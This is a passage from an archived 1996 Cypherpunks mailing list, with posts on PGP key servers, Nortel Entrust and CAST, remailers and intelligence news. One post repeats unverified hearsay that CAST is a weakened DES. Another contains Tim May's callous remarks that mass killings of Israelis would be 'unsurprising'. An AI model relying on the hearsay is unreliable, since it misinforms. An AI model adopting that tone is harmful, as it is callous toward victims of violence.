get a lot easier.  You never have to go back a check with the issuer about
anything. This will probably work for some applications, but there's
certainly others for which it won't.

LL

At 2:21 PM 2/29/96, Carl Ellison wrote:
>At 12:01 2/29/96, Laurence Lundblade wrote:
>>I think a problem occurs when you have 20 billion of
>>these certs (two for every person in the year 2010 or such).  A simple hash
>>into a table isn't going to cut it because you a single database (with
>>replication?) isn't going to be possible.
>
>BTW, at the rate that memory gets cheaper and smaller, it might be quite
>reasonable to have that single database fit alongside your daily appointments
>in your shirt-pocket daily organizer and e-mail terminal, in 2010.
>
>
>+--------------------------------------------------------------------------+
>|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
>|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
>|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
>|Reston, VA 22091      Tel: (703) 620-4200                                 |
>+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: combee@sso-austin.sps.mot.com (Ben Combee)
Date: Fri, 1 Mar 96 07:39:24 PST
To: austin-cpunks@einstein.ssz.com
Subject: [AUSTIN] Local Cypherpunks Meeting Saturday
Message-ID: <9603011538.AA25235@sso-austin cliffy.sps.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is your friendly reminder of the Austin Cypherpunks meeting
tomorrow, Saturday the 2nd.  We'll meet at the Central Market Cafe at
38th and Lamar at 6PM.  Topics include the video (I'll have a
camera!), ITAR relaxation, RC4 now being called PC1, how to duck the
CDA using crypto, hardware random number generators, and stuff like
that.  The meeting should go around 2 hours depending on the crowd,
and there is a Bookstop next door if you want to browse some reading
material later.

Look for the people with technical books and/or crypto-related shirts.
They will be us.

(I'm sending this to both austin-cpunks and cypherpunks.)
-- 
Ben Combee, CAD Software Developer, small language enthusiast, HTML dude
Motorola, Paging Products Group, Strategic Semiconductor Operation--Austin
E-mail: combee@sso-austin.sps.mot.com   Phone: (512) 891-7141



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 1 Mar 96 08:22:02 PST
To: cypherpunks@toad.com
Subject: RE: Nortel "Entrust"
Message-ID: <9603011621.AA05015@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Applied Crypto 2nd Edition - page 334-335.
 
Brief stuff:
Block Cypher (symetrical), 64 bit key, 64 bit block size
"The S-boxes are implemenation dependent, but not key dependent."
resistant to differential and linear cryptanalysis
   "Northern Telecom is using CAST in their Entrust security
    software package for Macintoshes, PCs, and UNIX workstations.
    The particular S-boxes they chose are not public.  The
    Candadian government is evaluating CAST as a new encryption
    standard.  CAST is patent pending."
 
If you don't have the book - GET IT!  ;-)
 
Dan
 
> From: "Stephen A. Gutknecht" <sgutknec@computek.net>
> To: "'cypherpunks@toad.com'" <cypherpunks@toad.com>
> Subject: RE: Nortel "Entrust"
>
> I too would like to see an open discussion on this.  Microsoft uses this for 
> their new Exchange Server client/server email product....
>
> ----------
> From:         Jonathon Fletcher[SMTP:jonathon@japan.sbi.com]
> Sent:         Friday, March 01, 1996 10:17 AM
> To:   cypherpunks@toad.com
> Subject:      Nortel "Entrust"
>
>
>   Can anyone tell me anything about a product called "Entrust", by Nortel
> (Northern Telecom). The notes talk about the software using DES ("which
> employs a 56-bit key") so I guess it's single DES, not triple DES. It also
> mentions a proprietary algorithm called CAST.
>
>   Is this worthy of further investigation, or is it suspect ? What is
> CAST, and would it be classed as snake oil ?
>
 
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 1 Mar 96 07:27:09 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: SET spec available
In-Reply-To: <ad5bf2e804021004ce92@DialupEudora>
Message-ID: <199603011527.KAA19582@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


John Pettitt writes::
# The SET transaction spec is now available on www.visa.com (and presumably on
# www.mastercard.com although I didn't check).

Norman Hardy writes:
> I am unable to find the specs. Anyone have an URL?

http://www.mastercard.com still works for me. I haven't looked at the Visa
site in a few days.

-Lewis



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Fri, 1 Mar 96 07:40:20 PST
To: cypherpunks@toad.com
Subject: Location of Cyphermericon?
Message-ID: <Pine.LNX.3.91.960301103816.5690A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Where can I find it? Please send ftp or URL via private E-Mail.

(define(RSA m e n)(list->string(u(r(s(string->list m))e n))))(define(u a)(if(>
a 0)(cons(integer->char(modulo a 256))(u(quotient a 256)))'()))(define(s a)(if
(null? a)0(+(char->integer(car a))(* 256(s(cdr a))))))(define(r a x n)(cond((=
0 x)1)((even? x)(modulo(expt(r a(/ x 2)n)2)n))(#t(modulo(* a(r a(1- x)n))n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 1 Mar 96 07:42:54 PST
To: jonathon@japan.sbi.com (Jonathon Fletcher)
Subject: Re: Nortel "Entrust"
In-Reply-To: <Pine.SUN.3.91.960301161135.11367M-100000@doe905f>
Message-ID: <199603011542.KAA19745@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jonathon Fletcher writes:
>   Can anyone tell me anything about a product called "Entrust", by Nortel
> (Northern Telecom). The notes talk about the software using DES ("which
> employs a 56-bit key") so I guess it's single DES, not triple DES. It also
> mentions a proprietary algorithm called CAST. 
> 
>   Is this worthy of further investigation, or is it suspect ? What is 
> CAST, and would it be classed as snake oil ?

I asked one of the NorTel sales reps. about this at the RSA conference. As
I recall, CAST is an espionage-enabled version of DES -- i.e. 16 of the key
bits are sent in the clear, or have a fixed value, or something along those
lines. The guy I spoke to didn't know the technical details.

Of course, maybe we should consider 56-bit DES espionage-enabled at this 
point too ! 

>   Please cc to me in mail

(done)

-Lewis



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Fri, 1 Mar 96 08:15:11 PST
To: Adam Shostack <cme@cybercash.com (Carl Ellison)
Subject: Re: A brief comparison of email encryption protocols
Message-ID: <9603011612.AA09147@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:20 PM 2/29/96 -5300, Adam Shostack wrote:

>key://ftp.clark.net/pub/u/cme/cme-current.asc
>key://ftp.clark.net/pub/u/cme/cme-longterm.asc

        Just as a head up on not duplicating work with regards to 
incorporating URL's into key certificates and DBs you might want to consider 
URI's, URC's or URN's as the piece to bind since URL's are considered to be 
almost as unstable as email..

        Check out for more on these naming schemes.

   Linkname: WRL: Web: URXs
        URL: http://webreference.com/urx.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQCVAwUBMTcfaP0Ael7bLK1/AQG56QQAxr+Tii4UMytdQUXIrKzIp2ckY4UfbGqW
BpkduSxha0lL8Mo2kmzOL4Z3s4NiJMExvzUKOo6Y16MuCXhKgJyxH5VN+Nk1Y/ov
qNpm4zaFOiAFQTbjMhSWJgFGmm6uaHuOez5jZDpSCpZTSBbXUwR349lxXjEtuvy8
hm+w0ADr/VQ=
=SYWa
-----END PGP SIGNATURE-----
_______________________
Regards,            There is no point at which you can say, 'Well, I'm
		    successful now.  I might as well take a nap.' -Carrie Fisher
Joseph Reagle       http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 1 Mar 96 08:19:09 PST
To: "A. Padgett Peterson P.E. Information Security"    <PADGETT@hobbes.orl.mmc.com>
Subject: Re: a brief comparison of e-mail encryption protocols
In-Reply-To: <960301090649.202002a4@hobbes.orl.mmc.com>
Message-ID: <199603011617.LAA15140@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


I think we are in violent agreement here...

> I disagree but then my worldview is different. For personal use the
> compact distributed system is workable however when you start thinking
> in terms of a large distributed organization, the quanta changes.
> 
> Mention was made of the difficulty of handling 20,000 keys. I am looking at
> over 80,000 today and over 200,000 tomorrow *for a single organization*. For
> quantities like this, a hierarchial system of management seems inevitable.

Perhaps you misunderstood what I mean by "central keyserver model".
What I mean by that is the status quo, where we have a set of central
keyservers and each keyserver knows about each key.  When I say that
this will disappear, I mean that we will move towards a more
distributed system, similar to the DNS for looking up hostnames.  Yes,
we will need a distributed, hierarchial [sic] system in the future,
and if we want to continue using PGP we will need to provide a simpler
way to use that.

> First, I am not about to give up my personal PGP key, it is trustworthy and
> effective for my needs. It is not necessarily incompatable with an 
> organizational structure.

This is true.

> However *for the organization* something else is needed. I can see a 
> future in which the bulk of the population has only two keys: their own
> and the punlic key of their post office (not talking USNail - private ones
> though not saying the US might not operate one as well).

I disagree.  I know the addresses of the people with whom I
communicate regularly.  I know my parent's USnail address, my
grandparents', my SO's, etc.  I dont need to tell the Post Office
"Send this to my parents" and trust them to do it.  I give them a
destination address and trust them to send it to the proper
destination.  The same thing is true in the electronic world.  I put a
destination on the email, give it to the mailer, and trust it to send
it to the appropriate destination.

A similar anology can be made when I dont know an address: I ask
someone for it.  Same thing with an email address/PGP key, I need to
ask for it before I can use it.

The same thing is true of hostnames.  I can find a hostname<->IP
address for just about any host on the planet.  Do I have them all on
my local disk?  No, of course not.  I look them up when I need them.
However, I do cache local copies of the names I frequently use.

> As noted, a hierarchal mechanism will be needed for key retrieval -
> only local keys and "frequent fliers" will be kept locally. Not new
> concept, just not used by post offices that I know of today.

Yes, this is true.  And it is used -- its called regional phone books.
If I want to get a number for someone, I go to the regional phone book
and look them up.  I have to know something about them first, so I
know where to look.  If I asked you to find the machine
"incommunicado" and tell me it's IP address, what would you do?  You'd
have to look in every domain for machines named "incommunicado".
However, if you knew that I meant "in the 'ihtfp.org' domain", you'd
know exactly where to look.  The same is true of phone numbers.  The
same is true for keys.

> Will need a bit of fleshing out and expect the end-state to be 2-4 years out
> but is a good time to think about it.

True.  The problem is that with PGP messages, the only information
about keys is a "random" keyID.  From a keyID there is no way to
determine that key unless you already have it.  This means that if you
do not already have the key, you have no way to find that key.  See
the problem?  This is like the "find 'incommunicado'" problem above.

What I propose is to modify, slightly, the PGP signature certificate
to add a "hint" field.  This hint field would tell you where to look
for the key.  This is the way to add the "ihtfp.org" info to the
PGP signature.

I hope this clears up any misconceptions...

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: galvin@eit.com (James M. Galvin)
Date: Fri, 1 Mar 96 08:15:38 PST
To: "Housley, Russ" <housley@spyrus.com>
Subject: Re: [ Death of MOSS? ]
Message-ID: <v02140b05ad5cb7d6a7b5@[153.37.6.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:17 PM 2/29/96, Housley, Russ wrote:
>Jim, in what way does the end user distinguish between the MOSS-like
>integration and the S/MIME-and-MSP-like integration?  It seems to me that a
>good user agent implementation provides the same services to the user.

Russ, since you weren't present at the workshop I'll repeat the very first
words I said in the presentation I gave there.

Functionally, from a user's perspective, there is for all practical
purposes no difference between any of these technologies.  Today I would
add that we could pick one out of hat and just move on.

However, there are differences in the technologies.  Some are easier to
implement, some are more flexible, some perform better, and the list goes
on.  We need to explore those differences to develop a criteria for
evaluating the technologies so we can provide the best possible solution to
the user community.  I proposed one possible criteria in my presentation,
by no means the only one and by no means complete.

Jim

----------------------------------------------------------------------------
James M. Galvin                                               galvin@eit.com
VeriFone/EIT, PO Box 220, Glenwood, MD 21738                 +1 410.795.6882






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 1 Mar 96 08:35:54 PST
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: FWD> ADMIRAL WILLIAM O. STU
Message-ID: <n1386442261.66404@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


Mail*Link(r) SMTP               FWD> ADMIRAL WILLIAM O. STUDEMAN

Gee I guess we can trust these guys....

----


    CONCORD, Calif., Feb. 28 /PRNewswire/ -- Premenos Technology Corp.
(Nasdaq: PRMO), a leading provider of electronic data interchange (EDI)
software solutions for electronic commerce applications, today announced
the election of Admiral William O. Studeman, U.S. Navy-retired, to its
Board of Directors effective immediately. Studeman will also act as
consultant on special projects including security and encryption issues.
          Admiral Studeman, age 56, is the former Deputy Director of Central
Intelligence and served for five months in 1995 as the acting Director
of Central Intelligence. He retired from the Navy in October 1995. Prior
to his assignment at the Central Intelligence Agency (CIA), Studeman was
the Director of the National Security Agency (NSA), and before that was
the Director of Naval Intelligence. In these positions, Studeman was
involved in attempting to develop public policies and technologies that
addressed the complex and often conflicting issues of enhanced economic
competitiveness, law enforcement's warranted requirement for information
transparency in pursuit of criminal investigations, national security
interest in combating potential information warfare threats, and the
country's overall increased need for enhanced protection of its
information-related systems and applications.
          In commenting on his election to the Board of Premenos, Studeman
stated that "Premenos is not only a leader in facilitating the promising
future of electronic commerce, it is the first company in the
marketplace with a product line for enhanced protection, security and
integrity for the Internet and other electronic communications-related
business transactions." Studeman added, "In working with Lew Jenkins and
others in the company, I have an opportunity to better frame the
government-industry dialogue and define the infrastructure, standards,
regulatory, technical and other directional factors which must be
addressed for electronic commerce -- a rapidly evolving industry segment
so fundamental to the future of the American lifestyle and national
security."
          Lew Jenkins, chairman and founder of Premenos said, "The
infrastructure for moving critical business data over the Internet is
crucial to the success of electronic commerce. We welcome Admiral
Studeman to our team and look forward to his help in developing a
trusted model for the electronic commerce market and establishing a
solid infrastructure similar to the stringent military requirements that
have been in place for decades."
          About Premenos Corp.
          Premenos is setting the agenda for electronic commerce and EDI
through open networks such as the Internet. Premenos EDI software is an
enabling strategy for transforming how corporations conduct business in
extended enterprises using electronic communications. Templar -- a suite
of software and services that enable businesses to send and receive EDI
documents securely and reliably over the Internet -- was awarded the
EMA '95 Electronic Commerce Product Excellence Award recognizing the
most innovative new product debuted at EMA's annual conference. Premenos
products support the IBM AS/400, RISC System/6000, HP 9000, SunSparc,
Windows 3.x, NT and Windows 95. Premenos has a worldwide presence with
sales offices in California, London and Paris. Contact Premenos World
Wide Web (WWW) home page at http://www.premenos.com to access over
3000 pages of information on electronic commerce, EDI, standards, as
well as Premenos corporate information materials.
          NOTE:  Premenos is a registered trademark of Premenos Corp. All
other product and company names are trademarks of their respective
corporations.
      CO:  Premenos Technology Corp.
      ST:  California
      IN:  CPR
      SU:  PER









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Fri, 1 Mar 96 08:52:10 PST
To: cypherpunks@toad.com
Subject: Re: Problems with certificates
Message-ID: <199603011649.LAA05110@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

PADGETT@hobbes.orl.mmc.com wrote:

> Next rage might well be "vanity" PGP keys. While at the moment it is not known
> how to create a specific match key to a sequence, if you generate enough
> keys, there will be some interesting sequences found. Possibly some PGP
> signatures will even be in violation of the CDA (now that should start a
> rush 8*).

Funny you should mention that, I noticed a strange message in my key the
other day ...


	Type bits/keyID    Date        User ID
	pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
	-----BEGIN PGP PUBLIC KEY BLOCK-----

	mQDKAjED/fgD6AEEANi8U98UJ/Wm3rxiZuPrkvLmOifV8y68MgdRnQQtQDsoGa0L
	OWjoH8yLTVEi8dKeU52Bdr0p+M2TaW8Z+0phW43P9mBaM2sw42vq1FyBxv0EjtEn
	8VbN6i7SC1+Xp4GsX9I8ctlN4y59gEcOFSHFCJjw9heRlM8Cq9M+30vAAdANAekB
	livXDe0T+PGPesUeMedaMliveDehT+PGPesUeMedaMliveDehT+PGPesUeMedaMl
	iveDehT+PGPes6eMA7QlR2FyeSBIb3dsYW5kIDxnYXJ5QGthbXBhaS5ldXJvbmV0
	Lm5sPokBFQIFEDED/i7oDjFwD/HBoQEB3K4H/icZoG0lE5pitriLdqqwNZB0kZiT
	yEnvhg1NqOZwCusHqzMV71S+vDfYYSrl7VjmCVaEOgPAT3kpc7ShXsWpFa4y9pXF
	AjBgR/9crcH98cbrIlGMArKKNiGITGq8tpKvAowyIaG6gn1W7XZRFd0hISrI1C3y
	j13JUFWyYLjNuA/tPiIfZ2h/HUu4LgFr2WhFn4/l3IVcGVLeCLK6Gv4dxd8HEt2d
	mGn7WAygarf7PQevHLIoxElwJkIea6necbgYx5p2GOUNW3/N478n3n6TT1jpu1pU
	RUGYRd5cGYc7z6gXb15FZw0z3uh4ybTEP4pOflBjBPJm27RcEYtuZxSuKQg=
	=Liso
	-----END PGP PUBLIC KEY BLOCK-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTcqiyoZzwIn1bdtAQHwaQF/ZBY9JZ6e6dgXjAORuRLQSbRY2JuZHGbN
1a69D0NwvRBdrB4iIjWCdwBQuhXXCd+K
=8nI2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 1 Mar 96 08:57:11 PST
To: Jonathon Fletcher <jonathon@japan.sbi.com>
Subject: Re: Nortel "Entrust"
In-Reply-To: <Pine.SUN.3.91.960301161135.11367M-100000@doe905f>
Message-ID: <199603011655.LAA21202@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathon Fletcher writes:
>   Can anyone tell me anything about a product called "Entrust", by Nortel
> (Northern Telecom). The notes talk about the software using DES ("which
> employs a 56-bit key") so I guess it's single DES, not triple DES. It also
> mentions a proprietary algorithm called CAST. 
> 
>   Is this worthy of further investigation, or is it suspect ? What is 
> CAST, and would it be classed as snake oil ?

"Entrust" was built by Smart People. Of course, any given component of
it is only as strong as the underlying algorithms; you yourself are
probably aware of the problems associated with DES vs 3DES and such. I
would suggest examining the documents.

I don't know anything about CAST.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 1 Mar 96 09:27:58 PST
To: cypherpunks@toad.com
Subject: MAF_ios
Message-ID: <199603011727.MAA21665@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-1-96. TWP:

   "Expert Panel Wants Intelligence Director to Hold More
   Power."

      The commission finds that the patchwork of 14 separate
      intelligence agencies is functioning well in its current
      form. To meet tbe growing threat of worldwide criminal
      activity the panel suggested creation of a high-level
      policy group run out of the White House, called tbe
      Global Crime Committee. It would be chaired by the
      president's national security adviser and would include
      the AG, State, DoD, and the DCI.

   "Turner: CIA Nearly Used A Journalist in Tehran."

      CIA's covert operators do not want to reopen the debate.
      As Turner put it, "Is the media case stronger than
      businessmen or academics? The covert operators are
      worried that we may reach a point where prohibitions
      will get us down to where there is nobody left to spy
      but the Foreign Service."

   3-1-96. NYT:

   "Commission Recommends Streamlined Spy Agencies."

      Most of the changes the report will recommend are
      evolutionary, not revolutionary. Intelligence officials
      used the same word to describe it: "underwhelming." The
      report fails to answer the big overstaffing problem. An
      official said the resistance within the intelligence
      agencies to staff cutting would be so strong that the
      downsizing would never happen.

   MAF_ios











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johan@eniac.campus.luth.se (Johan Sandberg)
Date: Fri, 1 Mar 96 06:50:43 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Thanks!
Message-ID: <191.6634T53T2971@eniac.campus.luth.se>
MIME-Version: 1.0
Content-Type: text/plain


I have to thank everyone who helped me with using cypherpunk remailers!
Thank you very much..
I've got very much response on this so I have to thank you all in this
message!


Johan Sandberg





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!news.cais.net!nntp.uio.no!ns.ftns.no!news@warwick.com
Date: Wed, 6 Mar 96 06:50:59 PST
To: cypherpunks@toad.com
Subject: Test
Message-ID: <313B33A3.5956@ringnett.no>
MIME-Version: 1.0
Content-Type: text/plain


This is a test...
-- 
Live on the edge, push the limits, and go EXTREME...
--------------------------------------------------------------------------
Svein Ove Solsvik          *  E-Mail:                 sveinove@ringnett.no

-Our Father, UART in Heaven, I/O'ed by the name...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 4 Mar 96 19:38:43 PST
To: cypherpunks@toad.com
Subject: Re: Bombings, Surveillance, and Free Societies
Message-ID: <ad60f3f80c021004bafb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:28 AM 3/5/96, Phillip M. Hallam-Baker wrote:
>Timothy C. May wrote:
>
>>The Red Brigade in Italy sought a fascist crackdown, and
>> the "strategy of tension" is common. (And even revolutionists of crypto
>> anarchist persuasion often think laws like the CDA are good in the long
>> run, by undermining respect for authority and triggering more extreme
>> reactions....)
>
>It is important to note in this regard that the worst bombing in Italy was
>the Bologna station bombing, now decisively linked to right wing facist
>groups the involvment in which of ex-prime minister Adreotti is shortly to
>be examined in a criminal trial. The point being that the extreemists play
>into each others hands.

Yes, it is hard to know even which side is pulling the strings. The WW2
Italian fascist commando leader, Otto Skorzeny, not only rescued Mussolini
from a ski chalet, he also helped set up the PLO in the 1960s, and
consulted for the OSS, CIA, and such. (There is much more to say about
this, and about the role of the early NSA in such affairs. However,
continuing down this path will produce the inevitable perrygrams from the
acerbic Mr. Metzger demanding "What does this have to [whatever my current
interest is]?"))

>> -- expect the various laws about "talking about explosives on the Net" to
>> be used to clamp down on various fringe groups
>
>Hang on here, some of those groups are actively conspiring to commit
>terrorist acts. If someone sends a message saying "lets plant a bomb
>under a federal building, that will show them" I'm not worried if the
>govt. decides to arrest a few people. There is a border between free
>speech and conspiracy to murder which some people have crossed.

I don't buy this. I said "talking about explosives on the Net," not openly
conspiring to plant bombs in federal buildings. A big difference. (Not that
I am aware of the OKC bombers discussing their plans on the Usenet.)


>> I predict that it will take about 5 more major bombings in European and
>> American cities to trigger substantive changes in laws.
>
>Generally it takes two. The legislation is written after the first and
>then staled until being passed on the second.

I am sandbagging by saying "5." I wasn't referring to 5 in, say, the U.S.,
but to 5 or so "horrific" bombs in Western countries, plus Israel. A second
Oklahoma City-type bombing may be enough, a Sarin attack that kills 1,000
will almost surely be enough. (In the bigger scheme of things, the 150-200
or so who died in OKC are a drop in the bucket, and I wouldn't advocate
_any_ new surveillance laws for them...putting a day care center in a soft
target demonstrates the callousness of the Feds.)

>> Personally, while I feel sorry for the dead in Israel, I think anyone who
>> moves to a small desert state surrounded on all sides by Arabs who want
>> their land back is asking for trouble.
>
>A point to consider is that there are many Isralis born in Israel who have no
>other home. These people did not ask to be born in the middle of a desert
>state. As with the Irish problem it is easy to solve if one could change
>the past. The fundamental problem being that the wrong side won at Hastings.

Let me use the language Bill Stewart used a while back, language which
skirts the issue of "right" and "wrong" even more neatly than I did (when I
said the Jews were "asking for trouble"):

"If a religious group uses force to expel the current occupants of a desert
region, and expels them to just beyond their borders, it is "unsurprising"
that those expelled, and their children, and their children's children,
will swear a blood oath to drive the group into the sea."

Put another way, I will not be "surprised" to wake up one morning and hear
on CNN that Tel Aviv has been vaporized in a nuclear explosion. Nor will I
be surprised to similarly learn that Damascus has been vaporized, and so
on.

Being an atheist, I treat all religious mystics as suspect. When a bunch of
people leave London and Chicago and Paris to live in the desert, surrounded
by sworn enemies with nuclear capabilities, I think whatever happens to
them is...."unsurprising."

I hope this makes my outlook clearer. (And Cypherpunks should fully
understand that information-trading systems and unbreakably encryption--the
very technologies we so ardently are pushing--make certain actions even
less "surprising" than might otherwise be the case. Think of it as
evolution in action.)


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 4 Mar 96 18:50:19 PST
Subject: [BABBLE] Like a Rolling Stone
Message-ID: <Pine.ULT.3.91.960304204752.28819A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just got off the phone with a writer from Rolling Stone magazine.  They 
are going to be doing an article about the Geek Code.

Isn't that just groovy?

Maybe they'll let me be on the cover and I can do one of those Howard 
Stern nude things.....


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMTuPhjokqlyVGmCFAQGzoAQAqdHYz6tMEPlu/4n/nsrYO/eIz96K/ZSJ
44Gzehrtrlw0zg6rpdWab7BzbCapjqJEgnupRsGRVzlQ449LYLVZ2KIHwMfK5zFe
0hS57USj1ShQyqeNv6K2qGmH38n5/U6oAgnpXo8LPBWgkN9zxBI04hiBtoeQrnak
UCfeg31EmWU=
=Vq8N
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!news.sprintlink.net!news.utech.net!@warwick.com
Date: Wed, 6 Mar 96 07:21:00 PST
To: cypherpunks@toad.com
Subject: Just testing the post
Message-ID: <313CE451.4C9A@utech.net>
MIME-Version: 1.0
Content-Type: text/plain


Post Test
-- 

John G. Jones
Director, Computer Services UTDS, Inc.
<http://www.utech.net>  <mailto:john@utech.net>
1593 E. Chestnut
Lompoc, CA  93436 
(805) 735-4447




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NSA Spook <mixmaster@spook.alias.net>
Date: Tue, 5 Mar 96 16:39:15 PST
To: remailer-operators@c2.org
Subject: None
Message-ID: <199603060039.SAA06419@riker.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


The Spook is back!

Hello everyone!

	The Spook is back! mixmaster@spook.alias.net is now functional 
again with bothe Type-I and Type-II remailers. The Type-II remailer 
supports news posting via mail2news@myriad.alias.net. The PGP Type-I key 
is the same as the old spook. The Mixmaster key however, is new.

For your records:

spook mixmaster@spook.alias.net 5c46a4b6c2cf00bfc7f693be81f88554 2.0.3
vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0.3
flame remailer@flame.alias.net 8b52e01256d96db2cefb21a081c64d34 2.0.3
secrets secret@secret.alias.net 834795b553fa43cbf33bea8f490a2b77 2.0.3b6
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
shinobi remailer@shinobi.alias.net ab3c9b8f6c593ec7af312f5cfec49a9b 2.0.3
treehole treehole@mockingbird.alias.net 2c9f098377bf4f068751683f803834f5 2.0.3
mix mixmaster@remail.obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
ecafe-mix mixmaster@remail.ecafe.org fff0d827161069a26ca44dead777c9ec 2.0.1
amnesia amnesia@chardos.connix.com f37b7c77cd62ede86abb6e10c09601c1 2.0.3
black-ice mix@black-ice.gateway.com 42048f5769ecdd8df71abf49389fb3ac 2.0.3
yap remailer@yap.pactitle.com cb0ffde1d93706502e3b9a2dea3b12cb 2.0.3
alpha mixmaster@alpha.c2.org fb2afc9b497be22ad18abf1c41996eb0 2.0.2
lead mix@zifi.genetics.utah.edu a76c3fda7294a6695c5e6a931d1c0b73 2.0.3
gondolin mix@remail.gondolin.org ed590656117439564465d5cc539864ad 2.0.3
nemesis remailer@meaning.com f59733a7f257900b09eb138764259a38 2.0.3

mix mixmaster@remail.obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1

-----Begin Mix Key-----
db91418edac3a4d7329feaee0b79c74f
258
AATL25WGQY5CMM0/xBjYtuN6IT75h+aBQwwKqZZc
